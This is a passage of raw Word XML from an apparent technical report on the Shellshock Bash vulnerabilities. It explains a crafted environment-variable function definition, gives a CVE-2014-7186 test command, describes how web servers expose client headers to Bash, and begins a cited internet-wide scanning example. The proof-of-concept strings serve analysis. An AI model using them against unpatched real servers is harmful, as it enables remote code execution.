        </w:rPr>
        <w:t xml:space="preserve">) { (a)=&gt;\’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c “echo date”; cat echo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00475A87" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In the script, the author attempted to define an environmental variable function X with a body of </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00475A87">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a)=&gt;\</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But there are several intentionally constructed tricks in this definition. First, the definition is not a complete one as </w:t>
      </w:r>
      <w:r w:rsidR="003E2B42">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>there is no right curly bracket</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Second,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(a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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is a command with erroneous grammar and will</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 xml:space="preserve">invoke exception. Third,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is not used to escape the right single quotation mark but to be a r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">turn. At the execution process, </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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triggered the exception and now only </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;\</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is left in the buffer region. Magically, Bash will put </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo date</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in the current buffer region and execute. Since we mentioned that </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</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is a return mark here, the effect of the command is equivalent to </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; echo date</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now it is evident that </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</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here works as a redirection mark. The command is the same as </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>date &gt; echo</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which write a file named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echo</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in the system.  The file is full of output of </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>date</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command. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2522D" w:rsidRDefault="00C2522D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00526DF6">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Other bugs in Shellshock family </w:t>
      </w:r>
      <w:r w:rsidR="00AD6A5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00501B12">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">targeting </w:t>
      </w:r>
      <w:r w:rsidR="00391B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the manner that </w:t>
      </w:r>
      <w:r w:rsidR="002D5C9F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bash parses</w:t>
      </w:r>
      <w:r w:rsidR="001E0686">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C970D6">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">code. </w:t>
      </w:r>
      <w:r w:rsidR="00D818C7">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CVE-2014-7186</w:t>
      </w:r>
      <w:r w:rsidR="00C83E8C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="007270CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">related to </w:t>
      </w:r>
      <w:r w:rsidR="009A546F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an ou</w:t>
      </w:r>
      <w:r w:rsidR="00ED5611">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t-of-bounds memory access error. </w:t>
      </w:r>
      <w:r w:rsidR="009766C3">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="0087582B">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">command below </w:t>
      </w:r>
      <w:r w:rsidR="006F6EDB">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">is one </w:t>
      </w:r>
      <w:r w:rsidR="00903566">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>demonstration</w:t>
      </w:r>
      <w:r w:rsidR="004E3EAA">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE7E7C" w:rsidRPr="0084414B" w:rsidRDefault="00CE7E7C" w:rsidP="0084414B">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084414B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084414B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 'true &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF &lt;&lt;EOF' ||</w:t>
      </w:r>
      <w:r w:rsidRPr="0084414B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084414B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "CVE-2014-7186 vulnerable, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084414B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>redir_stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084414B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00D91658">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00CE7E7C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00286903">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidR="0088277B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">includes multiple </w:t>
      </w:r>
      <w:r w:rsidR="00134E84">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">declarations of </w:t>
      </w:r>
      <w:r w:rsidR="006A6F2F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">“&lt;&lt;EOF” </w:t>
      </w:r>
      <w:r w:rsidR="00A745C0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00F41CC1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trigger </w:t>
      </w:r>
      <w:r w:rsidR="0097780B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">an error and </w:t>
      </w:r>
      <w:r w:rsidR="006A7F0B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">make </w:t>
      </w:r>
      <w:r w:rsidR="000C332D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0008565B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vulnerable Bash</w:t>
      </w:r>
      <w:r w:rsidR="000C332D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo the text “</w:t>
      </w:r>
      <w:r w:rsidR="000C332D" w:rsidRPr="000C332D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2014-7186 vulnerable, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C332D" w:rsidRPr="000C332D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>redir_stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C332D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B66455" w:rsidRPr="00CE7E7C" w:rsidRDefault="00B66455">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Targeted programs/services  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>As current HTTP server programs such as Apache are working in such a manner that they d</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">namically spawn subshells to meet the requirement of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outbursting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> large scale visiting as well as save r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sources at low traffic periods. This mechanism inevitably involves the exporting of environment variables.  Some of the environment variables could be taken from clients, such as HTTP_USER_AGENT, HTTP_HEADER. A very good example is provided by Robert Graham at his website as </w:t>
      </w:r>
      <w:r w:rsidR="0008565B" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r w:rsidR="0008565B" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target=0.0.0.0/0</w:t>
      </w:r>
    </w:p>
